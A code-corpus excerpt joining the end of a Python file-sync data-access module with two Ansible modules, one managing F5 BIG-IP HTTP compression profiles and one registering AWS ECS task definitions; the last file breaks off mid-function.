def accept_share(self, user_id, share_id):
"""Accept a share."""
user = self._get_user(user_id)
share = user.get_share(share_id)
share.accept()
return {}
def decline_share(self, user_id, share_id):
"""Decline a share."""
user = self._get_user(user_id)
share = user.get_share(share_id)
share.decline()
return {}
def list_shares(self, user_id, accepted):
"""List all the shares the user is involved.
This includes the 'shared_by' (shares from the user to somebody else)
and the 'shared_to' (shares from somebody else to the user). In the
later, a filter is done regarding if the shares were accepted by the
user or not.
"""
user = self._get_user(user_id)
# shared_by
shared_by = []
for share in user.get_shared_by():
# get info from the shared_to user (if any)
other_user = share.shared_to
to_username = other_user.username if other_user else None
to_visible_name = other_user.visible_name if other_user else None
resp = dict(id=share.id, root_id=share.root_id, name=share.name,
shared_to_username=to_username,
shared_to_visible_name=to_visible_name,
accepted=share.accepted, access=share.access)
shared_by.append(resp)
# shared_to
shared_to = []
for share in user.get_shared_to(accepted=accepted):
# get info from the shared_to user (if any)
other_user = share.shared_by
by_username = other_user.username if other_user else None
by_visible_name = other_user.visible_name if other_user else None
resp = dict(id=share.id, root_id=share.root_id, name=share.name,
shared_by_username=by_username,
shared_by_visible_name=by_visible_name,
accepted=share.accepted, access=share.access)
shared_to.append(resp)
return dict(shared_by=shared_by, shared_to=shared_to)
def create_udf(self, user_id, path, session_id):
"""Create an UDF."""
user = self._get_user(user_id, session_id)
udf = user.make_udf(path)
return dict(udf_id=udf.id, udf_root_id=udf.root_id, udf_path=udf.path)
def delete_volume(self, user_id, volume_id, session_id):
"""Delete a volume, being it a share or an udf."""
user = self._get_user(user_id, session_id)
        # we could ask permission instead of forgiveness here, but this is
        # cheaper than hitting the database just to see if the volume exists
try:
share = user.get_share(volume_id)
share.delete()
except errors.DoesNotExist:
# not a share, try it with a UDF
try:
user.delete_udf(volume_id)
except errors.DoesNotExist:
msg = "Volume %r does not exist" % (volume_id,)
raise errors.DoesNotExist(msg)
return {}
def get_user_quota(self, user_id):
"""Get the quota info for an user."""
user = self._get_user(user_id)
quota = user.get_quota()
d = dict(max_storage_bytes=quota.max_storage_bytes,
used_storage_bytes=quota.used_storage_bytes,
free_bytes=quota.free_bytes)
return d
def get_share(self, user_id, share_id):
"""Get the share information for a given id."""
user = self._get_user(user_id)
share = user.get_share(share_id)
d = dict(share_id=share.id, share_root_id=share.root_id,
name=share.name, shared_by_id=share.shared_by_id,
shared_to_id=share.shared_to_id, accepted=share.accepted,
access=share.access)
return d
def get_root(self, user_id):
"""Get the root id."""
user = self._get_user(user_id)
node = user.root.load()
return dict(root_id=node.id, generation=node.generation)
def get_volume_id(self, user_id, node_id):
"""Get the volume_id of a node.
        Note that this method does not return the same parameter that is
        returned by get_node (which returns vol_id).
"""
user = self._get_user(user_id)
node = user.volume().get_node(node_id)
volume_id = node.volume_id
if volume_id == user.root_volume_id:
volume_id = None
return dict(volume_id=volume_id)
def get_node_from_user(self, user_id, node_id):
"""Get node info from its id and the user, no matter the volume.
Note that in this case the content for the node is not returned.
"""
user = self._get_user(user_id)
node = services.get_node_for_shard(node_id, user.shard_id)
return self._process_node(node)
def get_node(self, user_id, volume_id, node_id):
"""Get node info from its id, volume and user.
The node is returned with its content.
"""
user = self._get_user(user_id)
node = user.volume(volume_id).get_node(node_id, with_content=True)
return self._process_node(node)
def _process_node(self, node):
"""Get info from a node."""
is_live = node.status == model.STATUS_LIVE
is_file = node.kind == 'File'
content = node.content
if content is not None:
crc32 = content.crc32
size = content.size
deflated_size = content.deflated_size
storage_key = content.storage_key
has_content = True
else:
crc32 = None
size = None
deflated_size = None
storage_key = None
has_content = False
d = dict(id=node.id, name=node.name, generation=node.generation,
is_public=node.is_public, deflated_size=deflated_size,
last_modified=node.when_last_modified, crc32=crc32,
storage_key=storage_key, is_live=is_live,
size=size, is_file=is_file, volume_id=node.vol_id,
parent_id=node.parent_id, content_hash=node.content_hash,
path=node.path, has_content=has_content)
return d
def get_delta(self, user_id, volume_id, from_generation, limit):
"""Get a delta from a given generation."""
user = self._get_user(user_id)
get_delta = user.volume(volume_id).get_delta
vol_gen, free_bytes, delta = get_delta(from_generation, limit=limit)
nodes = [self._process_node(n) for n in delta]
return dict(vol_generation=vol_gen, free_bytes=free_bytes, nodes=nodes)
def get_from_scratch(self, user_id, volume_id, start_from_path=None,
limit=None, max_generation=None):
"""Get all nodes from scratch."""
user = self._get_user(user_id)
vol_gen, free_bytes, nodes = user.volume(volume_id).get_from_scratch(
start_from_path=start_from_path, limit=limit,
max_generation=max_generation)
nodes = [self._process_node(n) for n in nodes]
return dict(vol_generation=vol_gen, free_bytes=free_bytes, nodes=nodes)
def get_user_data(self, user_id, session_id):
"""Get data from the user."""
user = self._get_user(user_id, session_id)
return dict(root_volume_id=user.root_volume_id, username=user.username,
visible_name=user.visible_name)
def make_content(self, user_id, volume_id, node_id, original_hash,
hash_hint, crc32_hint, inflated_size_hint,
deflated_size_hint, storage_key, magic_hash, session_id):
"""Get node and make content for it."""
user = self._get_user(user_id, session_id)
node = user.volume(volume_id).get_node(node_id)
node.make_content(original_hash, hash_hint, crc32_hint,
inflated_size_hint, deflated_size_hint,
storage_key, magic_hash)
return dict(generation=node.generation)
def _process_uploadjob(self, uj):
"""Get the info of an upload job to return as dict."""
d = dict(
uploadjob_id=uj.id,
uploaded_bytes=uj.uploaded_bytes,
multipart_id=uj.multipart_id,
multipart_key=uj.multipart_key,
chunk_count=uj.chunk_count,
hash_context=uj.hash_context,
magic_hash_context=uj.magic_hash_context,
decompress_context=uj.decompress_context,
inflated_size=uj.inflated_size,
crc32=uj.crc32,
when_last_active=uj.when_last_active,
)
return d
def get_uploadjob(self, user_id, volume_id, node_id, uploadjob_id,
hash_value, crc32, inflated_size,
deflated_size):
"""Make an upload job for a node."""
user = self._get_user(user_id)
node = user.volume(volume_id).get_node(node_id)
uj = node.get_multipart_uploadjob(uploadjob_id, hash_value, crc32,
inflated_size, deflated_size)
return self._process_uploadjob(uj)
def make_uploadjob(self, user_id, volume_id, node_id, previous_hash,
hash_value, crc32, inflated_size,
deflated_size, multipart_key):
"""Make an upload job for a node."""
user = self._get_user(user_id)
node = user.volume(volume_id).get_node(node_id)
uj = node.make_uploadjob(previous_hash, hash_value, crc32,
inflated_size, deflated_size,
multipart_key=multipart_key)
return self._process_uploadjob(uj)
def set_uploadjob_multipart_id(self, user_id, uploadjob_id, multipart_id):
"""Set the multipart id for an upload job."""
user = self._get_user(user_id)
uj = user.get_uploadjob(uploadjob_id)
uj.set_multipart_id(multipart_id)
return {}
def delete_uploadjob(self, user_id, uploadjob_id):
"""Delete an upload job."""
user = self._get_user(user_id)
uj = user.get_uploadjob(uploadjob_id)
uj.delete()
return {}
def add_part_to_uploadjob(self, user_id, uploadjob_id, chunk_size,
inflated_size, crc32, hash_context,
magic_hash_context, decompress_context):
"""Add a part to an upload job."""
user = self._get_user(user_id)
uj = user.get_uploadjob(uploadjob_id)
uj.add_part(chunk_size, inflated_size, crc32,
hash_context, magic_hash_context, decompress_context)
return {}
def touch_uploadjob(self, user_id, uploadjob_id):
"""Touch an upload job."""
user = self._get_user(user_id)
uj = user.get_uploadjob(uploadjob_id)
uj.touch()
return dict(when_last_active=uj.when_last_active)
def get_reusable_content(self, user_id, hash_value, magic_hash):
"""Return if the blob exists and its storage_key."""
user = self._get_user(user_id)
be, sk = user.is_reusable_content(hash_value, magic_hash)
return dict(blob_exists=be, storage_key=sk)
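# --- Illustrative usage sketch (not part of the original module) ---
# The DAL class is a thin service facade over backends.filesync.data; the
# calls below assume a configured database and an existing storage user id.
#
# dal = DAL()
# dal.ping()                       # {'response': 'pong'}
# root = dal.get_root(user_id=1)   # {'root_id': ..., 'generation': ...}
# quota = dal.get_user_quota(user_id=1)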
| agpl-3.0 |
mgit-at/ansible | lib/ansible/modules/network/f5/bigip_profile_http_compression.py | 3 | 16178 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2018, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_profile_http_compression
short_description: Manage HTTP compression profiles on a BIG-IP
description:
- Manage HTTP compression profiles on a BIG-IP.
version_added: 2.7
options:
name:
description:
- Specifies the name of the compression profile.
required: True
parent:
description:
- Specifies the profile from which this profile inherits settings.
- When creating a new profile, if this parameter is not specified, the default
is the system-supplied C(httpcompression) profile.
description:
description:
- Description of the HTTP compression profile.
buffer_size:
description:
- Maximum number of compressed bytes that the system buffers before inserting
a Content-Length header (which specifies the compressed size) into the response.
- When creating a new profile, if this parameter is not specified, the default
is provided by the parent profile.
gzip_level:
description:
- Specifies the degree to which the system compresses the content.
- Higher compression levels cause the compression process to be slower.
      - Valid values range from 1 (least compression and fastest) to 9 (most
compression and slowest).
choices:
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
gzip_memory_level:
description:
- Number of kilobytes of memory that the system uses for internal compression
buffers when compressing a server response.
choices:
- 1
- 2
- 4
- 8
- 16
- 32
- 64
- 128
- 256
gzip_window_size:
description:
- Number of kilobytes in the window size that the system uses when compressing
a server response.
choices:
- 1
- 2
- 4
- 8
- 16
- 32
- 64
- 128
partition:
description:
- Device partition to manage resources on.
default: Common
state:
description:
- When C(present), ensures that the profile exists.
- When C(absent), ensures the profile is removed.
default: present
choices:
- present
- absent
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
'''
EXAMPLES = r'''
- name: Create an HTTP compression profile
bigip_profile_http_compression:
name: profile1
description: Custom HTTP Compression Profile
buffer_size: 131072
gzip_level: 6
    gzip_memory_level: 16
    gzip_window_size: 64
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
description:
description: The new description of the resource.
returned: changed
type: string
sample: My custom profile
buffer_size:
description: The new buffer size of the profile.
returned: changed
type: int
sample: 4096
gzip_memory_level:
description: The new GZIP memory level, in KB, of the profile.
returned: changed
type: int
sample: 16
gzip_level:
description: The new GZIP level of the profile. Smaller is less compression.
returned: changed
type: int
sample: 2
gzip_window_size:
description: The new GZIP window size, in KB, of the profile.
returned: changed
type: int
sample: 64
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
from library.module_utils.network.f5.common import transform_name
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
from ansible.module_utils.network.f5.common import transform_name
class Parameters(AnsibleF5Parameters):
api_map = {
'bufferSize': 'buffer_size',
'defaultsFrom': 'parent',
'gzipMemoryLevel': 'gzip_memory_level',
'gzipLevel': 'gzip_level',
'gzipWindowSize': 'gzip_window_size',
}
api_attributes = [
'description',
'bufferSize',
'defaultsFrom',
'gzipMemoryLevel',
'gzipLevel',
'gzipWindowSize',
]
returnables = [
'description',
'buffer_size',
'gzip_memory_level',
'gzip_level',
'gzip_window_size',
]
updatables = [
'description',
'buffer_size',
'gzip_memory_level',
'gzip_level',
'gzip_window_size',
]
class ApiParameters(Parameters):
@property
def description(self):
if self._values['description'] in [None, 'none']:
return None
return self._values['description']
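    # Added note (inferred from the conversions in this module, not from F5 docs):
    # the module exposes gzip_memory_level and gzip_window_size in kilobytes
    # (see the choices in ArgumentSpec), while the REST API appears to carry the
    # values in bytes, hence the divide-by-1024 here and the matching
    # multiply-by-1024 in UsableChanges.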
@property
def gzip_memory_level(self):
if self._values['gzip_memory_level'] is None:
return None
return self._values['gzip_memory_level'] / 1024
@property
def gzip_window_size(self):
if self._values['gzip_window_size'] is None:
return None
return self._values['gzip_window_size'] / 1024
class ModuleParameters(Parameters):
@property
def parent(self):
if self._values['parent'] is None:
return None
result = fq_name(self.partition, self._values['parent'])
return result
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
@property
def gzip_memory_level(self):
if self._values['gzip_memory_level'] is None:
return None
return self._values['gzip_memory_level'] * 1024
@property
def gzip_window_size(self):
if self._values['gzip_window_size'] is None:
return None
return self._values['gzip_window_size'] * 1024
class ReportableChanges(Changes):
@property
def gzip_memory_level(self):
if self._values['gzip_memory_level'] is None:
return None
return self._values['gzip_memory_level'] / 1024
@property
def gzip_window_size(self):
if self._values['gzip_window_size'] is None:
return None
return self._values['gzip_window_size'] / 1024
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
@property
def parent(self):
if self.want.parent != self.have.parent:
raise F5ModuleError(
"The parent profile cannot be changed"
)
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.want = ModuleParameters(params=self.module.params)
self.have = ApiParameters()
self.changes = UsableChanges()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = UsableChanges(params=changed)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def exec_module(self):
changed = False
result = dict()
state = self.want.state
if state == "present":
changed = self.present()
elif state == "absent":
changed = self.absent()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.client.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def exists(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/profile/http-compression/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError:
return False
if resp.status == 404 or 'code' in response and response['code'] == 404:
return False
return True
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the resource.")
return True
def create(self):
self._set_changed_options()
if self.module.check_mode:
return True
self.create_on_device()
return True
def create_on_device(self):
params = self.changes.api_params()
params['name'] = self.want.name
params['partition'] = self.want.partition
uri = "https://{0}:{1}/mgmt/tm/ltm/profile/http-compression/".format(
self.client.provider['server'],
self.client.provider['server_port']
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 403, 404]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def update_on_device(self):
params = self.changes.api_params()
uri = "https://{0}:{1}/mgmt/tm/ltm/profile/http-compression/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 404]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def absent(self):
if self.exists():
return self.remove()
return False
def remove_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/profile/http-compression/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.delete(uri)
if resp.status == 200:
return True
raise F5ModuleError(resp.content)
def read_current_from_device(self): # lgtm [py/similar-function]
uri = "https://{0}:{1}/mgmt/tm/ltm/profile/http-compression/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
name=dict(required=True),
parent=dict(),
buffer_size=dict(type='int'),
description=dict(),
gzip_level=dict(
type='int',
choices=[1, 2, 3, 4, 5, 6, 7, 8, 9]
),
gzip_memory_level=dict(
type='int',
choices=[1, 2, 4, 8, 16, 32, 64, 128, 256]
),
gzip_window_size=dict(
type='int',
choices=[1, 2, 4, 8, 16, 32, 64, 128]
),
state=dict(
default='present',
choices=['present', 'absent']
),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
)
client = F5RestClient(**module.params)
try:
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
exit_json(module, results, client)
except F5ModuleError as ex:
cleanup_tokens(client)
fail_json(module, ex, client)
if __name__ == '__main__':
main()
| gpl-3.0 |
nitzmahone/ansible | lib/ansible/modules/cloud/amazon/ecs_taskdefinition.py | 20 | 19863 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ecs_taskdefinition
short_description: Register a task definition in ECS
description:
- Registers or deregisters task definitions in the Amazon Web Services (AWS) EC2 Container Service (ECS)
version_added: "2.0"
author: Mark Chance (@Java1Guy)
requirements: [ json, botocore, boto3 ]
options:
state:
description:
- State whether the task definition should exist or be deleted
required: true
choices: ['present', 'absent']
arn:
description:
      - The ARN of the task definition to delete
required: false
family:
description:
      - A name that would be given to the task definition
required: false
revision:
description:
- A revision number for the task definition
required: False
force_create:
description:
      - Always create a new task definition
required: False
version_added: 2.5
type: bool
containers:
description:
      - A list of container definitions
required: False
network_mode:
description:
- The Docker networking mode to use for the containers in the task.
- C(awsvpc) mode was added in Ansible 2.5
required: false
default: bridge
choices: [ 'bridge', 'host', 'none', 'awsvpc' ]
version_added: 2.3
task_role_arn:
description:
- The Amazon Resource Name (ARN) of the IAM role that containers in this task can assume. All containers in this task are granted
the permissions that are specified in this role.
required: false
version_added: 2.3
execution_role_arn:
description:
- The Amazon Resource Name (ARN) of the task execution role that the Amazon ECS container agent and the Docker daemon can assume.
required: false
version_added: 2.7
volumes:
description:
- A list of names of volumes to be attached
required: False
launch_type:
description:
- The launch type on which to run your task
required: false
version_added: 2.7
choices: ["EC2", "FARGATE"]
cpu:
description:
- The number of cpu units used by the task. If using the EC2 launch type, this field is optional and any value can be used.
If using the Fargate launch type, this field is required and you must use one of [256, 512, 1024, 2048, 4096]
required: false
version_added: 2.7
memory:
description:
- The amount (in MiB) of memory used by the task. If using the EC2 launch type, this field is optional and any value can be used.
If using the Fargate launch type, this field is required and is limited by the cpu
required: false
version_added: 2.7
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
- name: Create task definition
ecs_taskdefinition:
containers:
- name: simple-app
cpu: 10
essential: true
image: "httpd:2.4"
memory: 300
mountPoints:
- containerPath: /usr/local/apache2/htdocs
sourceVolume: my-vol
portMappings:
- containerPort: 80
hostPort: 80
logConfiguration:
logDriver: awslogs
options:
awslogs-group: ecs
awslogs-region: us-west-2
- name: busybox
command:
- >
/bin/sh -c "while true; do echo '<html><head><title>Amazon ECS Sample App</title></head><body><div><h1>Amazon ECS Sample App</h1><h2>Congratulations!
</h2><p>Your application is now running on a container in Amazon ECS.</p>' > top; /bin/date > date ; echo '</div></body></html>' > bottom;
cat top date bottom > /usr/local/apache2/htdocs/index.html ; sleep 1; done"
cpu: 10
entryPoint:
- sh
- "-c"
essential: false
image: busybox
memory: 200
volumesFrom:
- sourceContainer: simple-app
volumes:
- name: my-vol
family: test-cluster-taskdef
state: present
register: task_output
- name: Create task definition
ecs_taskdefinition:
family: nginx
containers:
- name: nginx
essential: true
image: "nginx"
portMappings:
- containerPort: 8080
hostPort: 8080
cpu: 512
memory: 1GB
state: present
- name: Create task definition
ecs_taskdefinition:
family: nginx
containers:
- name: nginx
essential: true
image: "nginx"
portMappings:
- containerPort: 8080
hostPort: 8080
launch_type: FARGATE
cpu: 512
memory: 1GB
state: present
network_mode: awsvpc
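# The following is a minimal sketch, not part of the original examples: it
# deregisters a task definition by family and revision, per the state=absent
# behaviour documented above (an ARN could be used instead).
- name: Deregister task definition
  ecs_taskdefinition:
    family: nginx
    revision: 1
    state: absent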
'''
RETURN = '''
taskdefinition:
description: a reflection of the input parameters
type: dict
returned: always
'''
try:
import botocore
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import boto3_conn, camel_dict_to_snake_dict, ec2_argument_spec, get_aws_connection_info
from ansible.module_utils._text import to_text
class EcsTaskManager:
"""Handles ECS Tasks"""
def __init__(self, module):
self.module = module
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
self.ecs = boto3_conn(module, conn_type='client', resource='ecs', region=region, endpoint=ec2_url, **aws_connect_kwargs)
def describe_task(self, task_name):
try:
response = self.ecs.describe_task_definition(taskDefinition=task_name)
return response['taskDefinition']
except botocore.exceptions.ClientError:
return None
def register_task(self, family, task_role_arn, execution_role_arn, network_mode, container_definitions, volumes, launch_type, cpu, memory):
validated_containers = []
        # Ensure numeric parameters are ints, as required by boto
for container in container_definitions:
for param in ('memory', 'cpu', 'memoryReservation'):
if param in container:
container[param] = int(container[param])
if 'portMappings' in container:
for port_mapping in container['portMappings']:
for port in ('hostPort', 'containerPort'):
if port in port_mapping:
port_mapping[port] = int(port_mapping[port])
if network_mode == 'awsvpc' and 'hostPort' in port_mapping:
if port_mapping['hostPort'] != port_mapping.get('containerPort'):
self.module.fail_json(msg="In awsvpc network mode, host port must be set to the same as "
"container port or not be set")
validated_containers.append(container)
params = dict(
family=family,
taskRoleArn=task_role_arn,
networkMode=network_mode,
            containerDefinitions=validated_containers,
volumes=volumes
)
if cpu:
params['cpu'] = cpu
if memory:
params['memory'] = memory
if launch_type:
params['requiresCompatibilities'] = [launch_type]
if execution_role_arn:
params['executionRoleArn'] = execution_role_arn
try:
response = self.ecs.register_task_definition(**params)
except botocore.exceptions.ClientError as e:
self.module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
return response['taskDefinition']
def describe_task_definitions(self, family):
data = {
"taskDefinitionArns": [],
"nextToken": None
}
def fetch():
# Boto3 is weird about params passed, so only pass nextToken if we have a value
params = {
'familyPrefix': family
}
if data['nextToken']:
params['nextToken'] = data['nextToken']
result = self.ecs.list_task_definitions(**params)
data['taskDefinitionArns'] += result['taskDefinitionArns']
data['nextToken'] = result.get('nextToken', None)
return data['nextToken'] is not None
# Fetch all the arns, possibly across multiple pages
while fetch():
pass
# Return the full descriptions of the task definitions, sorted ascending by revision
return list(
sorted(
[self.ecs.describe_task_definition(taskDefinition=arn)['taskDefinition'] for arn in data['taskDefinitionArns']],
key=lambda td: td['revision']
)
)
def deregister_task(self, taskArn):
response = self.ecs.deregister_task_definition(taskDefinition=taskArn)
return response['taskDefinition']
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent']),
arn=dict(required=False, type='str'),
family=dict(required=False, type='str'),
revision=dict(required=False, type='int'),
force_create=dict(required=False, default=False, type='bool'),
containers=dict(required=False, type='list'),
network_mode=dict(required=False, default='bridge', choices=['bridge', 'host', 'none', 'awsvpc'], type='str'),
task_role_arn=dict(required=False, default='', type='str'),
execution_role_arn=dict(required=False, default='', type='str'),
volumes=dict(required=False, type='list'),
launch_type=dict(required=False, choices=['EC2', 'FARGATE']),
cpu=dict(),
memory=dict(required=False, type='str')
))
module = AnsibleAWSModule(argument_spec=argument_spec,
supports_check_mode=True,
required_if=[('launch_type', 'FARGATE', ['cpu', 'memory'])]
)
if not HAS_BOTO3:
module.fail_json(msg='boto3 is required.')
task_to_describe = None
task_mgr = EcsTaskManager(module)
results = dict(changed=False)
if module.params['launch_type']:
if not module.botocore_at_least('1.8.4'):
module.fail_json(msg='botocore needs to be version 1.8.4 or higher to use launch_type')
if module.params['execution_role_arn']:
if not module.botocore_at_least('1.10.44'):
module.fail_json(msg='botocore needs to be version 1.10.44 or higher to use execution_role_arn')
if module.params['containers']:
for container in module.params['containers']:
for environment in container.get('environment', []):
environment['value'] = to_text(environment['value'])
if module.params['state'] == 'present':
if 'containers' not in module.params or not module.params['containers']:
module.fail_json(msg="To use task definitions, a list of containers must be specified")
if 'family' not in module.params or not module.params['family']:
module.fail_json(msg="To use task definitions, a family must be specified")
network_mode = module.params['network_mode']
launch_type = module.params['launch_type']
if launch_type == 'FARGATE' and network_mode != 'awsvpc':
module.fail_json(msg="To use FARGATE launch type, network_mode must be awsvpc")
family = module.params['family']
existing_definitions_in_family = task_mgr.describe_task_definitions(module.params['family'])
if 'revision' in module.params and module.params['revision']:
            # The definition specifies revision. We must guarantee that an active revision of that number will result from this.
revision = int(module.params['revision'])
# A revision has been explicitly specified. Attempt to locate a matching revision
tasks_defs_for_revision = [td for td in existing_definitions_in_family if td['revision'] == revision]
existing = tasks_defs_for_revision[0] if len(tasks_defs_for_revision) > 0 else None
if existing and existing['status'] != "ACTIVE":
# We cannot reactivate an inactive revision
module.fail_json(msg="A task in family '%s' already exists for revsion %d, but it is inactive" % (family, revision))
elif not existing:
if not existing_definitions_in_family and revision != 1:
module.fail_json(msg="You have specified a revision of %d but a created revision would be 1" % revision)
elif existing_definitions_in_family and existing_definitions_in_family[-1]['revision'] + 1 != revision:
module.fail_json(msg="You have specified a revision of %d but a created revision would be %d" %
(revision, existing_definitions_in_family[-1]['revision'] + 1))
else:
existing = None
def _right_has_values_of_left(left, right):
# Make sure the values are equivalent for everything left has
for k, v in left.items():
if not ((not v and (k not in right or not right[k])) or (k in right and v == right[k])):
# We don't care about list ordering because ECS can change things
if isinstance(v, list) and k in right:
left_list = v
right_list = right[k] or []
if len(left_list) != len(right_list):
return False
for list_val in left_list:
if list_val not in right_list:
return False
else:
return False
# Make sure right doesn't have anything that left doesn't
for k, v in right.items():
if v and k not in left:
return False
return True
def _task_definition_matches(requested_volumes, requested_containers, requested_task_role_arn, existing_task_definition):
            if existing_task_definition['status'] != "ACTIVE":
return None
            if requested_task_role_arn != existing_task_definition.get('taskRoleArn', ""):
return None
            existing_volumes = existing_task_definition.get('volumes', []) or []
if len(requested_volumes) != len(existing_volumes):
# Nope.
return None
if len(requested_volumes) > 0:
for requested_vol in requested_volumes:
found = False
for actual_vol in existing_volumes:
if _right_has_values_of_left(requested_vol, actual_vol):
found = True
break
if not found:
return None
            existing_containers = existing_task_definition.get('containerDefinitions', []) or []
if len(requested_containers) != len(existing_containers):
# Nope.
return None
for requested_container in requested_containers:
found = False
for actual_container in existing_containers:
if _right_has_values_of_left(requested_container, actual_container):
found = True
break
if not found:
return None
return existing_task_definition
# No revision explicitly specified. Attempt to find an active, matching revision that has all the properties requested
for td in existing_definitions_in_family:
requested_volumes = module.params['volumes'] or []
requested_containers = module.params['containers'] or []
requested_task_role_arn = module.params['task_role_arn']
existing = _task_definition_matches(requested_volumes, requested_containers, requested_task_role_arn, td)
if existing:
break
if existing and not module.params.get('force_create'):
# Awesome. Have an existing one. Nothing to do.
results['taskdefinition'] = existing
else:
if not module.check_mode:
# Doesn't exist. create it.
volumes = module.params.get('volumes', []) or []
results['taskdefinition'] = task_mgr.register_task(module.params['family'],
module.params['task_role_arn'],
module.params['execution_role_arn'],
module.params['network_mode'],
module.params['containers'],
volumes,
module.params['launch_type'],
module.params['cpu'],
module.params['memory'])
results['changed'] = True
elif module.params['state'] == 'absent':
# When de-registering a task definition, we can specify the ARN OR the family and revision.
if module.params['state'] == 'absent':
if 'arn' in module.params and module.params['arn'] is not None:
task_to_describe = module.params['arn']
elif 'family' in module.params and module.params['family'] is not None and 'revision' in module.params and \
module.params['revision'] is not None:
task_to_describe = module.params['family'] + ":" + str(module.params['revision'])
else:
